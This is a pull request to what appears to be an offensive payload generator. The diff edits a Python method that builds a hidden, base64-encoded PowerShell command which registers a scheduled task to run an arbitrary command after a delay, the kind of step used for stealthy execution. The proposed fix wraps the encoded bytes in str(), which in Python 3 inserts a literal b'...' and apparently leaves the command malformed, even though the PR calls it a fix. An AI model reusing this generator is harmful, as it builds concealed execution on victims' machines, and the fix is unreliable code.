### PR TITLE
fixing 'TypeError: can only concatenate str, not bytes to str'

### DIFF
--- a/core/payloads.py
+++ b/core/payloads.py
@@ -14,7 +14,7 @@ class ScheduledPayload(object):
 
     def execute(self):
 
-        return 'powershell.exe -nop -w hidden -encodedCommand '+base64.b64encode(('''ipmo ScheduledTasks
+        return 'powershell.exe -nop -w hidden -encodedCommand '+str(base64.b64encode(('''ipmo ScheduledTasks
 $action = New-ScheduledTaskAction -Execute '%s' -Argument '%s'
 $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddSeconds(%d) # tick tick tick ;)
-Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "%s" -Description "%s"''' % (self.command, self.args, self.delay, self.taskname, self.description)).encode('utf-16-le'))
+Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "%s" -Description "%s"''' % (self.command, self.args, self.delay, self.taskname, self.description)).encode('utf-16-le')))

--- a/payload_generator
+++ b/payload_generator
@@ -46,4 +46,4 @@ if __name__ == '__main__':
 
     print
     print
-    print s.execute()
+    print (s.execute())


### PR DESCRIPTION
It will fix the following error generated by the /core/payloads.py file:

```
... core/payloads.py", line 17, in execute
    return 'powershell.exe -nop -w hidden -encodedCommand '+base64.b64encode(('''ipmo ScheduledTasks
TypeError: can only concatenate str (not "bytes") to str

```